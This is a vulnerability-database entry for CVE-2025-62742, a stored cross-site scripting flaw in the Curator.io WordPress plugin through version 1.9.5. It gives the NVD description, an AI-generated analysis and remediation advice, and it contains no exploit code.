CVE-2025-62742

2025-12-31 [email protected]
XSS Information Disclosure

Lifecycle Timeline

2
Analysis Generated
Apr 01, 2026 - 17:44 vuln.today
CVE Published
Dec 31, 2025 - 13:15 nvd
N/A

DescriptionNVD

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Curator.io Curator.io curatorio allows Stored XSS.This issue affects Curator.io: from n/a through <= 1.9.5.

AnalysisAI

Stored cross-site scripting (XSS) in Curator.io WordPress plugin through version 1.9.5 allows authenticated attackers to inject malicious scripts that execute in the browsers of other users viewing affected pages. The vulnerability stems from improper input sanitization during web page generation, enabling attackers with plugin access to compromise user sessions and steal sensitive data. While EPSS scoring indicates low exploitation probability (0.04%), the persistent nature of stored XSS and potential for privilege escalation warrant prompt patching.

Technical ContextAI

Curator.io is a WordPress plugin (CPE: wp:plugin:curatorio) that manages and displays curated content. The vulnerability is rooted in CWE-79 (Improper Neutralization of Input During Web Page Generation), a classic web application flaw where user-supplied input is not properly escaped or sanitized before being rendered in HTML output. When the plugin generates web pages, it fails to neutralize special characters or HTML entities in user input, allowing attackers to inject arbitrary JavaScript code. This code then executes in the context of the WordPress admin panel or frontend, depending on where the injection point exists, affecting any user who interacts with the compromised content.

Affected ProductsAI

Curator.io WordPress plugin (curatorio) versions through 1.9.5 are affected. The vulnerability impacts all installations of this plugin up to and including version 1.9.5. Additional version information, patch status, and vendor advisory details are available at the Patchstack vulnerability database entry linked in references.

RemediationAI

Update the Curator.io plugin to a patched version beyond 1.9.5 via the WordPress plugin dashboard or directly from the WordPress.org plugin repository. If an immediate patch version is not yet released, temporarily disable the plugin or restrict access to administrative and content-editing functions to trusted users only. Review audit logs for any suspicious content modifications that may indicate prior exploitation. For detailed remediation guidance and patch availability confirmation, consult the Patchstack vulnerability report at https://patchstack.com/database/Wordpress/Plugin/curatorio/vulnerability/wordpress-curator-io-plugin-1-9-5-cross-site-scripting-xss-vulnerability.

Share

CVE-2025-62742 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy